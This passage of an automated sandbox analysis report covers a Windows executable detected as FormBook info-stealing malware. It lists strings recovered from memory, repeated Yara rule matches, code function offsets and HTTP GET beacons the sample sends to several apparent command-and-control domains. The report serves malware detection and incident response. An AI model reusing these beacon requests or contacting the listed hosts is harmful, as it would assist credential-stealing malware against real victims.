76 69 72 75 73 2f 73 70 79 77 61 72 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 63 6f 6d 70 61 6e 79 20 70 6f 6c 69 63 79 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 69 6e 20 65 72 72 6f 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 62 3e 46 69 6c 65 20 6e 61 6d 65 3a 3c 2f 62 3e 20 20 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
  Data Ascii: <html><head><title>Virus/Spyware Download Bloc
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://fontfabrik.com
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.carterandcone.coml
Source: divpCHa0h7.exe, 00000001.00000002.267439269.0000000002AB1000.00000004.00000001.sdmp, String found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/?
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers8
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designers?
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.com/designersG
Source: divpCHa0h7.exe, 00000001.00000003.266066263.00000000059E0000.00000004.00000001.sdmp, String found in binary or memory: http://www.fontbureau.comasno
Source: divpCHa0h7.exe, 00000001.00000003.246781947.00000000059FB000.00000004.00000001.sdmp, String found in binary or memory: http://www.fonts.com
Source: divpCHa0h7.exe, 00000001.00000003.246654381.00000000059FB000.00000004.00000001.sdmp, String found in binary or memory: http://www.fonts.comX
Source: divpCHa0h7.exe, 00000001.00000003.246591944.00000000059FB000.00000004.00000001.sdmp, String found in binary or memory: http://www.fonts.comn
Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp, divpCHa0h7.exe, 00000001.00000003.249127036.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: divpCHa0h7.exe, 00000001.00000003.249127036.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/c
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cn_
Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cna-d
Source: divpCHa0h7.exe, 00000001.00000003.248804655.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cnl
Source: divpCHa0h7.exe, 00000001.00000003.248765539.0000000005A1D000.00000004.00000001.sdmp, String found in binary or memory: http://www.founder.com.cn/cnr-f
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.goodfont.co.kr
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/.
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/CursJ
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/Gras
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/Y0zS
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/a-e7
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/jp/
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/o
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/ri
Source: divpCHa0h7.exe, 00000001.00000003.250361250.00000000059E4000.00000004.00000001.sdmp, String found in binary or memory: http://www.jiyu-kobo.co.jp/t
Source: divpCHa0h7.exe, 00000001.00000003.246488006.00000000059FB000.00000004.00000001.sdmp, divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.com
Source: divpCHa0h7.exe, 00000001.00000003.246488006.00000000059FB000.00000004.00000001.sdmp, String found in binary or memory: http://www.sajatypeworks.coma-d
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.sakkal.com
Source: divpCHa0h7.exe, 00000001.00000003.247974313.00000000059E6000.00000004.00000001.sdmp, String found in binary or memory: http://www.sandoll.co.kr
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.tiro.com
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.typography.netD
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.urwpp.deDPlease
Source: divpCHa0h7.exe, 00000001.00000002.270330222.0000000006C82000.00000004.00000001.sdmp, String found in binary or memory: http://www.zhongyicts.com.cn
          Source: unknownDNS traffic detected: queries for: www.ribbonofficial.com
          Source: global trafficHTTP traffic detected: GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=MhZqZeIh1bEx9EPhBOs++VNt6zdxCxYLlsX+VD+R30361cyojbkVOC5VQe1OoxOfJLYr HTTP/1.1Host: www.ribbonofficial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=prTEVkQtidVRbelnknUsCYHPcHrUQSHWronmvObfBYwGPcpLSCQwPhh2tosJT24FW2ZT&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.sanlifalan.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?z0DH=f0Dtar1PYnAdDzS&ZvEd=cd5R1bQkGt60ucaw3I3E0k/wUnqrUWXrQueIKe7m3jIZGD6slZfTAntz2qvR4Gb0BO+l HTTP/1.1Host: www.floaterslaser.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=oM7C4s4K9Ux9NUwG97tedYlymorHgm5Kv3Umj1Gnv/i5ubiDMWU/+XDfdu3U3Pyuil7R&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.mambacustomboats.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?ZvEd=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8My9QnEOoaqj&z0DH=f0Dtar1PYnAdDzS HTTP/1.1Host: www.esyscoloradosprings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match File source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara match File source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara match File source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY

          System Summary:

          Malicious sample detected (through community Yara rule)
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: divpCHa0h7.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.divpCHa0h7.exe.3c268a0.2.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.divpCHa0h7.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.1.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 5.2.divpCHa0h7.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 1.2.divpCHa0h7.exe.3bdc680.3.raw.unpack, type: UNPACKEDPE Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.520122597.0000000002760000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.361762124.00000000005D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.290893406.0000000006D39000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000006.00000000.307316377.0000000006D39000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000001.265367323.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.361396861.0000000000400000.00000040.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.519918692.0000000002660000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000005.00000002.361951579.00000000009D0000.00000040.00020000.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 0000000F.00000002.517884800.0000000000610000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000001.00000002.267848070.0000000003AB9000.00000004.00000001.sdmp, type: MEMORY Matched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 1_2_0106D064
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 1_2_0106F296
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 1_2_0106F298
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 1_2_04F90D51
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 1_2_04F95A10
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_0040102D
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00401030
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_0041B8D3
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_0041B8D6
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_0041C98B
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_0041C343
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00408C8B
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00408C90
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00402D8C
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00402D90
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00402FB0
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F2B090
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00FD1002
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F34120
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F1F900
          Source: C:\Users\user\Desktop\divpCHa0h7.exe Code function: 5_2_00F4EBB0
